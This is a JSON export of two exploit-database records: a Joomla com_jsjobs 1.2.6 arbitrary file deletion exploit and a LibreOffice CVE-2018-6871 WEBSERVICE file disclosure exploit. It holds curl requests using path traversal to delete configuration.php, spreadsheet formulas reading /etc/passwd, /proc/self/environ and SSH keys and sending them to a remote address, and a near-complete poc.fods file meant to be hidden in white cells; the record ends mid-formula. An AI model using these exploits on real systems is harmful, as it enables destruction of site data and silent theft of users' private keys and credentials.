{"zdt": [{"lastseen": "2019-12-04T07:57:54", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-08-16T00:00:00", "published": "2019-08-16T00:00:00", "id": "1337DAY-ID-33120", "href": "https://0day.today/exploit/description/33120", "title": "Joomla com_jsjobs 1.2.6 component - Arbitrary File Deletion Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion\r\n# Dork: inurl:\"index.php?option=com_jsjobs\"\r\n# Exploit Author: qw3rTyTy\r\n# Vendor Homepage: https://www.joomsky.com/\r\n# Software Link: https://www.joomsky.com/5/download/1\r\n# Version: 1.2.6\r\n# Tested on: Debian/nginx/joomla 3.9.0\r\n\r\n# Vulnerability details:\r\n# This vulnerability is caused when processing custom userfield.\r\n\r\nFile:\t\tsite/models/job.php\r\nFunction:\tstoreJob\r\nLine:\t\t1240\r\n-------------------------------------\r\n\r\n 1215\t //custom field code start\r\n 1216\t $customflagforadd = false;\r\n 1217\t $customflagfordelete = false;\r\n 1218\t $custom_field_namesforadd = array();\r\n 1219\t $custom_field_namesfordelete = array();\r\n 1220\t $userfield = $this->getJSModel('customfields')->getUserfieldsfor(2);\r\n 1221\t $params = array();\r\n 1222\t $forfordelete = '';\r\n 1223\t \r\n 1224\t foreach ($userfield AS $ufobj) {\r\n 1225\t $vardata = '';\r\n 1226\t if($ufobj->userfieldtype == 'file'){\r\n 1227\t if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 0){\r\n 1228\t $vardata = $data[$ufobj->field.'_2'];\r\n 1229\t }else{\r\n 1230\t $vardata = $_FILES[$ufobj->field]['name'];\r\n 1231\t }\r\n 1232\t $customflagforadd=true;\r\n 1233\t $custom_field_namesforadd[]=$ufobj->field;\r\n 1234\t }else{\r\n 1235\t $vardata = isset($data[$ufobj->field]) ? $data[$ufobj->field] : '';\r\n 1236\t }\r\n 1237\t if(isset($data[$ufobj->field.'_1']) && $data[$ufobj->field.'_1'] == 1){\r\n 1238\t $customflagfordelete = true;\r\n 1239\t $forfordelete = $ufobj->field;\r\n 1240\t $custom_field_namesfordelete[]= $data[$ufobj->field.'_2'];\t\t//No check.\r\n 1241\t }\r\n ...snip...\r\n 1323\t // new\r\n 1324\t //removing custom field \r\n 1325\t if($customflagfordelete == true){\r\n 1326\t foreach ($custom_field_namesfordelete as $key) {\r\n 1327\t $res = $this->getJSModel('common')->uploadOrDeleteFileCustom($row->id,$key ,1,2);\t\t//!!!\r\n 1328\t }\r\n 1329\t }\r\n\r\nFile:\t\tsite/models/common.php\r\nFunction:\tuploadOrDeleteFileCustom\r\nLine:\t\t851\r\n-------------------------------------\r\n\r\n 748\t $path = $base . '/' . $datadirectory;\r\n 749\t if (!file_exists($path)) { // create user directory\r\n 750\t $this->makeDir($path);\r\n 751\t }\r\n 752\t $isupload = false;\r\n 753\t $path = $path . '/data';\r\n 754\t if (!file_exists($path)) { // create user directory\r\n 755\t $this->makeDir($path);\r\n 756\t }\r\n 757\t if($for == 3 )\r\n 758\t $path = $path . '/jobseeker';\r\n 759\t else\r\n 760\t $path = $path . '/employer';\r\n 761\t\r\n 762\t if (!file_exists($path)) { // create user directory\r\n 763\t $this->makeDir($path);\r\n 764\t }\r\n ...snip...\r\n 843\t } else { // DELETE FILES\r\n 844\t if ($isdeletefile == 1) {\r\n 845\t if($for == 3){\r\n 846\t $userpath = $path . '/'.$datafor.'_' . $resumeid . '/customfiles/';\r\n 847\t }else{\r\n 848\t $userpath = $path . '/'.$datafor.'_' . $id . '/customfiles/';\r\n 849\t }\r\n 850\t $file = $userpath.$field;\r\n 851\t unlink($file);\t\t//!!!\r\n 852\t }\r\n 853\t return 1;\r\n 854\t }\r\n 855\t }\r\n\r\n#####################################\r\n#PoC:\r\n#####################################\r\n\r\n# If an administrator has added custom userfield 'ufield926' as field type 'file', attacker are can trigger this vulnerability by send a following requests.\r\n\r\n$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F '[email\u00a0protected]/valid_image.jpg' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' \"http://localhost/index.php\"\r\n\r\n$> curl -X POST -i -H 'Cookie: VALID_SESSION_ID=VALID_SESSION_ID' -F 'options=com_jsjobs' -F 'task=job.savejob' -F 'id=666' -F 'enforcestoppublishjob=666' -F 'startpublishing=2019-08-16' -F 'stoppublishing=2019-08-16' -F 'description=woot' -F 'title=woot' -F 'ufield926_1=1' -F 'ufield926_2=../../../../../configuration.php' -F 'VALID_FORM_TOKEN_FROM_FORMJOB=1' \"http://localhost/index.php\"\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33120"}, {"lastseen": "2018-04-02T00:19:06", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2018-02-12T00:00:00", "published": "2018-02-12T00:00:00", "href": "https://0day.today/exploit/description/29774", "id": "1337DAY-ID-29774", "title": "LibreOffice < 6.0.1 - =WEBSERVICE Remote Arbitrary File Disclosure Vulnerability", "type": "zdt", "sourceData": "# Vulnerability description\r\n \r\n[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)\r\n \r\n## First part\r\n \r\nLibreOffice supports COM.MICROSOFT.WEBSERVICE function:\r\n \r\n https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\r\n \r\nThe function is required to obtain data by URL, usually used as:\r\n \r\n =FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\")\r\n \r\nIn original:\r\n \r\n For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.\r\n \r\nIn LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.\r\n \r\n## Second part\r\n \r\nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.\r\n \r\n# Exploitation\r\n \r\nTo read file you need just:\r\n \r\n =WEBSERVICE(\"/etc/passwd\")\r\n \r\nThis function can also be used to send a file:\r\n \r\n =WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\"))\r\n \r\nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path.\r\n \r\n =MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\",\r\n \r\nAlso you can parse other files too, like a ~/.ssh/config or something like that.\r\n \r\nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).\r\n \r\n# Impact\r\n \r\nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.\r\n \r\n# Acknowledgment\r\n \r\nVulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).\r\n \r\n - - -\r\n \r\n# poc.fods\r\n \r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n \r\n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\">\r\n <office:automatic-styles>\r\n <style:style style:name=\"co1\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co2\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co3\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co4\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co5\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co6\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/>\r\n </style:style>\r\n <style:style style:name=\"ro1\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ro2\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/>\r\n </style:style>\r\n <style:style style:name=\"ro3\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\">\r\n <style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/>\r\n </style:style>\r\n <style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/>\r\n <style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:text-properties style:use-window-font-color=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:table-cell-properties fo:background-color=\"#f3715a\"/>\r\n </style:style>\r\n <style:page-layout style:name=\"pm1\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/>\r\n </style:footer-style>\r\n </style:page-layout>\r\n <style:page-layout style:name=\"pm2\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:footer-style>\r\n </style:page-layout>\r\n </office:automatic-styles>\r\n <office:body>\r\n <office:spreadsheet>\r\n <table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/>\r\n <table:table table:name=\"Sheet1\" table:style-name=\"ta1\">\r\n <table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"8\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell table:number-columns-repeated=\"9\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro2\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Current user:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\">\r\n <text:p>689</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\">\r\n <text:p>676</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>http://localhost:8080</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro3\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>List of private keys:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\"/>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Send:</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>0 (default path)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"5\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\">\r\n <text:p>1</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\">\r\n <text:p>132</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\">\r\n <text:p>109</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\">\r\n <text:p>96</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\">\r\n <text:p>2</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\">\r\n <text:p>297</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\">\r\n <text:p>259</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\">\r\n <text:p>246</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\">\r\n <text:p>3</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\">\r\n <text:p>436</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\">\r\n <text:p>409</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\">\r\n <text:p>396</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"4\" calcext:value-type=\"float\">\r\n <text:p>4</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\">\r\n <text:p>586</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\">\r\n <text:p>563</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\">\r\n <text:p>550</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\">\r\n <text:p>5</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\">\r\n <text:p>718</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\">\r\n <text:p>695</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\">\r\n <text:p>682</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\">\r\n <text:p>6</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\">\r\n <text:p>882</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\">\r\n <text:p>860</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\">\r\n <text:p>847</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\">\r\n <text:p>7</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\">\r\n <text:p>1267</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\">\r\n <text:p>1240</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\">\r\n <text:p>1227</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\">\r\n <text:p>8</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\">\r\n <text:p>1408</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile 